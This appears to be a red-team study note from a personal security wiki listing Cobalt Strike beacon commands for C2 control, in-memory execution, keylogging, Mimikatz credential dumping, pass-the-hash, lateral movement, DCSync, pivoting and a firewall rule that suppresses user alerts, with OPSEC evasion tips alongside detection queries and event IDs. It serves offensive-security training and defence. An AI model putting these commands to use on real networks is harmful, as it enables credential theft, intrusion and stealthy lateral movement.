Security Memo

Search (Ctrl+K)

SearchSearch

Recent Notes

See 1423 more sorted by tag →

Cobalt Strike beacon command list

created Jan 08, 2024updated May 19, 20246 min read

Here is a list of common commands supported by a Cobalt Strike beacon. Also see S1ckB0y1337/Cobalt-Strike-CheatSheet for some notes.

Beacon Management

11-c2 C2

  • connect [host] [port]: let CS connect to another TCP beacon
  • link [host] [pipe]: let CS connect to another SMB beacon
  • sleep N: change the sleep interval to N seconds
    • OPSEC warning: increasing check-in frequency may produce more noise on the network and reduce stealth.
  • checkin: manually issue a check-in to the beacon
    • DNS beacons require a manual check-in upon connection because they do not automatically send metadata over (due to DNS bandwidth limits).

Job control

  • jobs: list jobs
  • jobkill N: kill job N

Session Passing

  • spawn [x86|x64] [listener]: create a process and inject shellcode for a given listener
  • foreign listener (MSF protocol):
    • In msfconsole: Start a handler and set payload to windows/meterpreter/reverse_http
    • In CS: Create a “Foreign HTTP” listener with host and port matching that of the MSF handler. Once the payload is run (e.g. in a spawn command), msfconsole will receive a new Meterpreter session.
    • Note: x64 & stageless payloads not supported
  • Alternatively, Meterpreter session can be created by first generating a raw stageless shellcode meterpreter payload using msfvenom, then using shspawn [x86|x64] [file-to-payload] to run it.

Code Execution

03-execution Running code

  • run: run a command
  • execute-assembly: beacon will run a C# executable provided by the attacker by injecting it in memory (no files saved)
  • powershell-import /path/to/module.ps1: import a PowerShell module (provided by the attacker)
  • powershell Cmdlet [Args...]: run a PowerShell command on the beaconed host; piping supported
  • powerpick Cmdlet [Args...]: run PowerShell commands without spawning a powershell.exe process; also supports AMSI-bypass (post-ex option) unlike powershell

Information Gathering

08-discovery Basic

  • getuid: get UID of beacon’s process

Screenshotting

  • screenshot / printscreen: take a screenshot (second one uses PrintScr)
  • screenwatch: take periodic screenshots of desktop

Keylogger

  • keylogger: start a keylogger job (also see View > Keystrokes)

Clipboard

  • clipboard: get clipboard content

Files:

  • mv A B: move/rename files
  • cd DIR: change current directory
  • upload PATH: upload a local file to the beaconed machine

Reconnaissance

  • net logons: view logged on users on machine

Mimikatz / credential theft

07-credential-access

  • logonpasswords / mimikatz !sekurlsa::logonpasswords: dump cached NTLM hashes / passwords (elevated)
    • OPSEC warning: This opens a read handle to LSASS and is logged under event 4656 (Kibana: “Suspicious Handle to LSASS”).
  • mimikatz !sekurlsa::ekeys: dump Kerberos encryption keys for logged on users, which are more relevant than NTLM hashes since it’s the former that gets used over the network most of the time. Look for aes256-hmac.
    • OPSEC warning: This opens a read handle to LSASS and is logged under event 4656 (Kibana: “Suspicious Handle to LSASS”).
  • mimikatz !lsadump::sam: This dumps NTLM hashes in the SAM database (local users only). If sysadmins reuse administrator passwords, SAM dumps can lead to lateral movement.
    • OPSEC warning: This opens a handle to the SAM registry hive (Kibana: “Suspicious SAM Hive Handle”).
  • mimikatz !lsadump::cache: Extracts domain cached credentials, which can only be cracked offline (since format isn’t NTLM) and cannot be used for attacks like pass-the-hash.
    • OPSEC warning: This opens a handle to the SECURITY registry hive (Kibana: “Suspicious SECURITY Hive Handle”).

NOTE

Aforementioned Kibana saved searches are found in RTO lab.

Lateral Movement

09-lateral-movement

  • pth DOMAIN\USER NTLM_HASH: pass-the-hash (uses Mimikatz underneath)
    • Use ls \\BEACON_HOST_FQDN\c$ to test for admin access after impersonation
    • make_token domain\user plaintext_pw: create a token for a user given the plaintext password (uses LogonUserA API); token can only be used over network
      • Logon type passed to LogonUserA is LOGON32_LOGON_NEW_CREDENTIALS, which uses the caller’s token for local machine, and only uses the provided credentials over the network. This means that make_token only works for authenticating against remote services. Use spawnas for local machine.
      • looks the same as runas /netonly in logs (hard to distinguish between regular and malicious traffic)
  • remote-exec [psexec|winrm|wmi] [target] [command args...]: execute a command on a remote host; use remote-exec without arguments to list supported modules (e.g. psexec, winrm, wmi).
    • see jump for psexec and winrm
    • wmi: WMI provides a “process call create” API to execute commands on the target. remote-exec abuses it by having it execute the uploaded payload binary.
      • To identify: event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe
  • jump [psexec|winrm|...] [target] [listener]: run a payload on a remote target; run jump without arguments to list supported modules (e.g. psexec, winrm, …)
    • winrm & winrm64
      • OPSEC note: Use of SMB payloads is recommended since SMB traffic occurs frequently in AD environments.
      • One way to identify this lateral movement (that produces a lot of false positives): event.category: process and event.type: start and process.name: wsmprovhost.exe
      • To identify this lateral movement: event.category: process and powershell.file.script_block_text: "$var_runme.Invoke([IntPtr]::Zero)"
    • psexec & psexec64: uploads a service binary that in turn executes the provided payload binary
      • Use of SMB payloads is also recommended as before.
      • To identify this lateral movement: event.code: 4697 and winlog.event_data.ServiceFileName: \\\\*\\ADMIN$\\*.exe
    • psexec_psh: use PowerShell oneliner instead of uploading a binary; always 32-bit
      • command pattern: %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand ...
  • Running a second BOF as a different user (e.g. in case the call to CoInitializeSecurity triggered by running the first BOF was under a low-privileged user): beacon> execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\Windows\smb_x64.exe"
  • rev2self: revert ticket to original (delete pass-the-hash ticket)

DCSync

07-credential-access09-lateral-movement See: DCSync

The dcsync command lets us obtain username and credential data (e.g. NTLM hash) from a DC. This requires GetNCChanges which usually is only available to domain admins.

beacon> dcsync [fqdn] [domain]\[user]

This can be useful for crafting a golden ticket (by specifying krbtgt as the user) or move laterally to other domain admins.

A ticket is required for this command (e.g. make_token DEV\jking Qwerty123)

The beacon command is a wrapper around mimikatz lsadump::dcsync, which uses the MS-DRSR protocol.

OPSEC warning

Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set).

Find these using the “Suspicious Directory Replication” saved search in Kibana.

Token Impersonation

See: token impersonation

Pivoting

pivoting

SOCKS

SOCKS4a proxy: beacon> socks [port]

OPSEC warning

SOCKS4a proxy may be used by any user or device that has access to the team server. Use SOCKS5 for best security (i.e. authentication).

SOCKS5 proxy (supports authentication & additional logging): beacon> socks [port] socks5 disableNoAuth [username] [password] enableLogging.

  • Either view the teamserver output or use journalctl to view SOCKS5 authlogs.

To use the proxy in proxychain, first edit the config:

# /etc/proxychains.conf
# ...
socks4 127.0.0.1 [port]
socks5 127.0.0.1 [port] [username] [password]
# ...

Then to make a program use the proxy:

$ proxychains [command] [args...]

Port Forwarding

Reverse port forwarding: forwards a source port (on the beaconed host) to a destination interface and port (on the team server)

beacon> rportfwd [source-port] [interface-ip] [dest-port]

OPSEC warning

Windows Defender Firewall alert will appear in the graphical shell. If the user clicks Cancel, an explicit block rule will be created. To prevent it, create a rule to allow the traffic before running the rportfwd beacon command:

beacon> powershell New-NetFirewallRule -DisplayName "Pfwd-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort [source-port]

Remove the firewall rule later by its diaplay name:

beacon> powershell Remove-NetFirewallRule -DisplayName "Pfwd-In"

Graph View

Sources

Backlinks